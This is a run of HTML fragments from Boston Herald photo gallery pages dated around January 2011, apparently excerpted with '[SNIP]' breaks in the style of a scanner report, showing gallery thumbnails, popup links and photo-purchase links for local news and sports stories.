<img id="nowPlayingOverlay20" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay21" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay22" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay23" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay24" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay25" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay26" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay27" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay28" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay29" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4884','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110128/stp/d3ff09_012811shutap01.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4880','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110128/stp/e5e8bf_012711snowtf12.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Snow piles up in Bay State"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Snow piles up in Bay State">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4874','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110127/stp/4bb523_012711collapsemg05.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Roof collapse in Lynn"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Roof collapse in Lynn">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4871','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110126/stp/db5172_012611snowtf10.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Snow, snow, snow..."><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Snow, snow, snow...">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4870','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110126/stp/e1e641_012511firems04.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Firefighter graduation"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Firefighter graduation">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4867','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110126/stp/8c0965_012511bulltf12.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Defenders"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Defenders">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4863','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110125/stp/732f60_012411homelessms06.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Homeless in Boston"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Homeless in Boston">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4860','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110123/stp/22b009_012311cold01.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Cold freeze"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Cold freeze">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4858','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110122/stp/a0e6f1_012211sh12.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4857','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110122/stp/2886c6_012211coldmg03.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Cold front hits Bay State"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Cold front hits Bay State">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4853','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110121/stp/e459dc_012111snowmg02.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\More snow"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\More snow">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4852','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110121/stp/a9d3ce_012011deathmg03.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4844','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110118/stp/5d3a34_011811feaar03.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\A wintry mess"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\A wintry mess">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4840','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110117/stp/3ac724_081309eunicenl20.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Remembering Sargent Shriver"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Remembering Sargent Shriver">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4837','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110117/stp/8db2b3_011711kingtf02.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Martin Luther King Jr. Memorial Breakfast"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Martin Luther King Jr. Memorial Breakfast">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4836','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110117/stp/44416d_011711firems04.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Brookline blaze"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Brookline blaze">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4835','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110117/stp/655b9b_011611pats01.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4834','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110117/stp/2b8728_011611featuresfn02.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Weather"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Weather">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4830','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110116/stp/27bc52_011511mushce001.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4820','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110114/stp/19cc02_011311arizona.jpeg04.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4813','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110113/stp/492776_Congresswoman_Shot_Obama__trose@heraldinteractive.com_43.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4804','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110111/stp/e5c919_010511haitiar04.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Haiti families rebuild"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Haiti families rebuild">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4802','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110111/stp/9cec40_011111kennedypw001.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Joe Kennedy III condemns Tucson shootings"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Joe Kennedy III condemns Tucson shootings">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4800','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110111/stp/9aef59_011011tucson04.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4797','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110110/stp/9a24a7_Congresswoman_Shot_Maho-3.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4796','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110110/stp/bca28b_010911balletfn02.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Bay State ballerina hopefuls"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Bay State ballerina hopefuls">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4793','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110108/stp/7da572_883504eba8db6a00e10e6a7067009f08.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4788','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110106/stp/5d68d0_010611guvtf01.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Inauguration Day"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Inauguration Day">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4784','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110106/stp/f7e3e6_010511swearingtf10.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Swearing in the new Legislature"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Swearing in the new Legislature">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4778','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110104/stp/035aca_010411parolems06.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Parole Board meeting"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Parole Board meeting">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4776','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110104/stp/b85dcd_010311megamw002.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Lottery madness"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Lottery madness">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4775','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110102/stp/e8f59d_073010explosionjw23.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\2010 in pictures"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\2010 in pictures">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4773','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110102/stp/bac977_010111brownieskm05.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\L Street Brownies' annual New Year...s Day swim"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\L Street Brownies' annual New Year...s Day swim">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4771','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110101/stp/fdc1cf_123110policejw03.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4760','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101231/stp/690b34_123010wakece004.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4881','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110128/stp/086319_012711bcms06.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Florida State 102, BC 93"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Florida State 102, BC 93">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4872','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110126/stp/cd0702_012611bruinsms04.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4868','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110126/stp/b85afa_012511celticsmw01.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4862','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110125/stp/036e70_012411celtsnl02.JPG" alt="Photo" /></a>
...[SNIP]...
